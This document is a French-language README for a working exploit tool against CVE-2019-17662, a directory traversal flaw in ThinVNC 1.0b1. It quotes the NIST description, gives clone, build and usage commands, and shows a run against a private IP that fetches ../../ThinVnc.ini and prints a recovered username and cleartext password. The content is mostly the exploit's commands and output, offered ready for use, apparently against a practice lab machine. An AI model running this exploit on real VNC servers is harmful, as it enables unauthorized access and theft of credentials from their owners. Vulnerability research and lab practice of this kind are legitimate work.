
Exploit pour CVE-2019-17662 (ThinVNC 1.0b1)
ThinVNC 1.0b1 est vulnérable à une lecture arbitraire de fichiers, ce qui conduit à une compromission du serveur VNC. La vulnérabilité existe même lorsque l'authentification est activée lors du déploiement du serveur VNC. Le mot de passe d'authentification est stocké en clair dans un fichier accessible via un vecteur d'attaque de type « directory traversal » : ../../ThinVnc.ini.
~ NIST
$ git clone https://github.com/whokilleddb/CVE-2019-17662
$ cd CVE-2019-17662
$ make
$ ./bin/CVE-2019-17662 -h
[~] Usage: ./bin/CVE-2019-17662 -u URL [-f File]
[>] Options:
OPTIONS Desciption
-u URL Base URL
-f File [Optional] File Name To Query (Default: ThinVnc.ini)
$ ./bin/CVE-2019-17662 -u http://10.10.185.214:8080/
[+] CVE-2019-17662 exploit by @whokilleddb
[o] Target : http://10.10.185.214:8080/
[x] File To Read: ThinVnc.ini
[~] Trying to Read: http://10.10.185.214:8080/abc/../../ThinVnc.ini
[:] Trying To Fetch Credentials
[-] User=Atlas
[-] Password=H0ldUpTheHe@vens